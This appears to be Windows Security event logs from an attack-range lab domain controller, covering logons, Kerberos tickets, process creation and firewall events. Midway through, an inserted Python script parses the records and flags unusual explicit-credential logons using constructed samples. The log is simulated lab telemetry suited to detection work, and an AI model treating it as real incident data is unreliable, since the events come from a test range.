SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887125
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 10
Restricted Admin Mode: No
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x8DB827
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {453F0EA2-89C5-2B2C-1385-10D5F3D1EC2F}
Process Information:
Process ID: 0x518
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: WIN-DC-982
Source Network Address: 174.27.138.219
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887124
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: administrator
Account Domain: ATTACKRANGE
Logon GUID: {453F0EA2-89C5-2B2C-1385-10D5F3D1EC2F}
Target Server:
Target Server Name: localhost
Additional Information: localhost
Process Information:
Process ID: 0x518
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Network Address: 174.27.138.219
Port: 0
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=887123
Keywords=Audit Success
Message=A Kerberos service ticket was requested.
Account Information:
Account Name: Administrator@ATTACKRANGE.LOCAL
Account Domain: ATTACKRANGE.LOCAL
Logon GUID: {2A1C2E2A-2C70-629D-D742-CF67F2DE680E}
Service Information:
Service Name: WIN-DC-982$
Service ID: ATTACKRANGE\WIN-DC-982$
Network Information:
Client Address: ::1
Client Port: 0
Additional Information:
Ticket Options: 0x40810000
Ticket Encryption Type: 0x12
Failure Code: 0x0
Transited Services: -
This event is generated every time access is requested to a resource such as a computer or a Windows service. The service name indicates the resource to which access was requested.
This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event. The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.
Ticket options, encryption types, and failure codes are defined in RFC 4120.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=887122
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: Administrator
Supplied Realm Name: attackrange.local
User ID: ATTACKRANGE\Administrator
Service Information:
Service Name: krbtgt
Service ID: ATTACKRANGE\krbtgt
Network Information:
Client Address: ::1
Client Port: 0
Additional Information:
Ticket Options: 0x40810010
Result Code: 0x0
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2
Certificate Information:
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
Certificate information is only provided if a certificate was used for pre-authentication.
Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887121
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887120
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887119
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887118
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Process Information:
New Process ID: 0x1858
New Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x34c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887117
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D340A
Process Information:
New Process ID: 0x1bb4
New Process Name: C:\Windows\System32\dwm.exe
Token Elevation Type: %%1938
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1648
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: "dwm.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887116
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D33D1
Privileges: SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeImpersonatePrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887115
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Virtual Account: Yes
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D340A
Linked Logon ID: 0x8D33D1
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x1648
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887114
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Virtual Account: Yes
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D33D1
Linked Logon ID: 0x8D340A
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x1648
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887113
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: DWM-3
Account Domain: Window Manager
Logon GUID: {00000000-0000-0000-0000-000000000000}
Target Server:
Target Server Name: localhost
Additional Information: localhost
Process Information:
Process ID: 0x1648
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Network Address: -
Port: -
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887112
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887111
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13fc
New Process Name: C:\Windows\System32\LogonUI.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1648
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: "LogonUI.exe" /flags:0x2 /state0:0xa3a3b055 /state1:0x41c64e6d
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
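The 4648 record above (winlogon.exe logging on the DWM-3 "Window Manager" account against localhost) and the 4688 record with its unresolved "Token Elevation Type: %%1936" placeholder are exactly the fields a detection engineer ends up parsing out of forwarded dumps like this one. The Python below is an added example, not part of the forwarded log or of any Splunk or Microsoft tooling: it splits records on the timestamp lines, stores message-body fields as "Section.Field" so the repeated "Account Name"/"Process ID" keys stay distinct, decodes %%1936/%%1937/%%1938 to the Type 1/2/3 descriptions that follow each 4688, and flags any 4648 that is not the routine winlogon-to-DWM pattern. The sample records are constructed (the first two are trimmed copies of the page's 4648 and 4688; the EXAMPLE\backup_svc record is invented), and the winlogon/Window Manager/localhost allow-list is an assumption to tune per environment.

```python
"""Parse Splunk-forwarded Windows Security events in this page's layout, decode the Token
Elevation Type placeholder in 4688 records, and flag 4648 explicit-credential logons that
do not match the routine winlogon.exe -> DWM-n -> localhost pattern seen on the page."""
import re
from typing import Dict, List

# Constructed sample in the page's layout: two trimmed records mirroring the page's 4648
# and 4688, then one invented record (EXAMPLE\backup_svc) to exercise the 4648 check.
SAMPLE_EVENTS = r"""04/19/2021 06:27:42 PM
EventCode=4648
RecordNumber=887113
Message=A logon was attempted using explicit credentials.
Subject:
Account Name: WIN-DC-982$
Account Whose Credentials Were Used:
Account Name: DWM-3
Account Domain: Window Manager
Target Server:
Target Server Name: localhost
Process Information:
Process Name: C:\Windows\System32\winlogon.exe
This event is generated when a process attempts to log on an account by explicitly specifying that account's credentials.
04/19/2021 06:27:42 PM
EventCode=4688
RecordNumber=887111
Message=A new process has been created.
Process Information:
New Process Name: C:\Windows\System32\LogonUI.exe
Token Elevation Type: %%1936
Process Command Line: "LogonUI.exe" /flags:0x2 /state0:0xa3a3b055 /state1:0x41c64e6d
04/19/2021 06:31:05 PM
EventCode=4648
RecordNumber=900001
Message=A logon was attempted using explicit credentials.
Account Whose Credentials Were Used:
Account Name: backup_svc
Account Domain: EXAMPLE
Target Server:
Target Server Name: fileserver.example.local
Process Information:
Process Name: C:\Users\Public\runme.exe
"""

TIMESTAMP_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")
HEADER_RE = re.compile(r"^([A-Za-z]+)=(.*)$")
# %%1936/%%1937/%%1938 are the unresolved placeholders Windows writes for Token Elevation
# Type 1/2/3, the three types described under each 4688 record on the page.
TOKEN_ELEVATION_TYPES = {"%%1936": "Type 1 (full token)", "%%1937": "Type 2 (elevated token)",
                         "%%1938": "Type 3 (limited token)"}
# Allow-list for 4648 (an assumption to tune per environment): winlogon.exe logging on a
# 'Window Manager' DWM-n account against localhost is routine session set-up.
ROUTINE_4648 = (r"c:\windows\system32\winlogon.exe", "window manager", "localhost")

def parse_events(text: str) -> List[Dict[str, str]]:
    """Split on timestamp lines; body fields become 'Section.Field' so repeated names
    (Account Name, Process ID) stay distinct. Trailing explanatory text is skipped."""
    events: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    section = ""
    for line in text.splitlines():
        line = line.strip()
        if TIMESTAMP_RE.match(line):
            if current:
                events.append(current)
            current, section = {"Timestamp": line}, ""
        elif (m := HEADER_RE.match(line)):
            current[m.group(1)] = m.group(2)
        elif line.endswith(":"):
            section = line[:-1]
        elif ": " in line:
            key, value = line.split(": ", 1)
            current[f"{section}.{key}" if section else key] = value
    if current:
        events.append(current)
    return events

def token_elevation_type(event: Dict[str, str]) -> str:
    raw = event.get("Process Information.Token Elevation Type", "")
    return TOKEN_ELEVATION_TYPES.get(raw, raw)

def explicit_logon_is_routine(event: Dict[str, str]) -> bool:
    observed = (event.get("Process Information.Process Name", "").lower(),
                event.get("Account Whose Credentials Were Used.Account Domain", "").lower(),
                event.get("Target Server.Target Server Name", "").lower())
    return observed == ROUTINE_4648

def triage(text: str) -> List[str]:
    """One finding per 4688 (decoded token type) and per non-routine 4648."""
    findings: List[str] = []
    for ev in parse_events(text):
        rec, code = ev.get("RecordNumber", "?"), ev.get("EventCode")
        if code == "4688":
            findings.append(f"{rec} 4688 {ev.get('Process Information.New Process Name')} -> {token_elevation_type(ev)}")
        elif code == "4648" and not explicit_logon_is_routine(ev):
            who = ev.get("Account Whose Credentials Were Used.Account Name")
            findings.append(f"{rec} 4648 REVIEW: {ev.get('Process Information.Process Name')} used {who} "
                            f"against {ev.get('Target Server.Target Server Name')}")
    return findings
```

Run `triage(SAMPLE_EVENTS)` to get one line per 4688 and per non-routine 4648; on the constructed input the page's own 4648 is suppressed by the allow-list while the invented runme.exe record is flagged. The section-qualified keys matter because a flat "Account Name" would be overwritten by whichever block came last, hiding exactly the "Account Whose Credentials Were Used" value the 4648 check depends on.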
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887195
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887194
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887193
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887192
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887191
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x458
New Process Name: C:\Windows\System32\dllhost.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x34c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80}
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887190
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 60398
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887189
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 60398
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69908
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887188
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60398
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887187
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60398
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887186
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 60480
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887185
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 60480
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69908
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887184
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60480
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887183
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60480
Protocol: 17
